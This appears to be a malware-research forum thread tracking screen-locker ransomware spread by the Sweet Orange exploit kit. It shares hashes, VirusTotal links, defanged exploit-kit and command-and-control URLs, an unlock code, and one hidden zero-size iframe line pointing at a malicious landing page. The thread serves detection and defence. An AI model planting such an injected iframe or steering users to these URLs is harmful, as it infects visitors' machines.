[EP_X0FF]

I think it bugged, as it impossible to enter correct deactivation code.



As for me, new appearance looks much better. Asks for ~65$ hm, inflation, I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/

[EP_X0FF]

Dropper, payload of Sweet Orange EK.

Iframe to EK.

Code: Select all

<iframe src="hxxp://df.pizdafyqib.ru/administrator/weather.php?browse=151 width="0" height="0" frameborder="0"></iframe>

SHA256: 11761b0b7d20efe6815f900cf8a0242dae9dec29ee0e309fd1b288e7b9b1c0ef
SHA1: 75dcb3332f21aa31bac16429290e7f6285184824
MD5: a73f6edd6f698edd692fbfe86855f6a4

https://www.virustotal.com/en/file/1176 ... /analysis/

EXE + Jar (CVE-2012-1723) in attach. Keep your Java up to date, or better get rid of it once and for all.

[Xylitol]

Keep your Java up to date

urlquery got winlocked when i submitted the site http://urlquery.net/report.php?id=2243853

Code: Select all

urlQuery Alerts	 No alerts detected

even not detected as sweet orange :)
C&C:

Code: Select all

hxxp://df.pizdafyqib.ru:8581/aw/index.php?m=stats
• dns: 1 ›› ip: 216.246.54.231 - adresse: DF.PIZDAFYQIB.RU
• dns: 1 ›› ip: 216.246.54.231 - adresse: B2B-VM6.VERTICALCOMMUNICATION.IN

[mrbelyash]

I think it bugged, as it impossible to enter correct deactivation code.



As for me, new appearance looks much better. Asks for ~65$ hm, inflation, I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/

unlock code 121255545

http://stop-winlock.ru/2013/05/01/troja ... 15437.html

[EP_X0FF]

Another Sweet Orange.

Code: Select all

hxxp://wsd.nuwazy.ru/sites/oplata/codestariff/themes.php?strategy=154

http://urlquery.net/report.php?id=2295153

[Xylitol]

Code: Select all

hxxp://wsd.nuwazy.ru/sites/oplata/codestariff/themes.php?strategy=154

Code: Select all

• dns: 1 ›› ip: 64.202.124.84 - adresse: WSD.NUWAZY.RU
hXXp://wsd.nuwazy.ru:8581/aw/

https://www.virustotal.com/ru/file/24f0 ... 367522337/
http://www.threatexpert.com/report.aspx ... c791b71390
Java 6 update 17 is enought to get the sample.

[EP_X0FF]

Fresh

Code: Select all

hxxp://za.omovigminet.ru/bugs/books/partner/themes.php?strategy=156

SHA256: e1dc306f502657cdc57fc4608aa6b4815747001478bf770afe7ec363fc264a8f
SHA1: 7d12a710f463d79e23ffe4f1bd94942537c3e868
MD5: c2b46eb6e92ebf65e9e8d580f17ecb98

https://www.virustotal.com/en/file/e1dc ... 367603355/

[EP_X0FF]

Fresh

Code: Select all

hxxp://rl7bh.ru/guest/recent.php?forums=170

landing

Code: Select all

hxxp://z.ylyzafaq.ru/xx/

SHA256: 0bfbbf1eb94a2fb9004847a0b008c5fc688b0a04665f18dba3ef9a91c1a5dc87
SHA1: 4def049567188969f050893e93a8f61062182473
MD5: eb6f708178d87cec2e2588a379c23285

https://www.virustotal.com/ru/file/0bfb ... 368451928/

[Xylitol]

PE embed in the string b64^0x7D

[EP_X0FF]

More fresh. Now 92$ to "unlock".

12.png (25.88 KiB) Viewed 452 times

http://urlquery.net/report.php?id=3097129
https://www.virustotal.com/de/file/fc3f ... /analysis/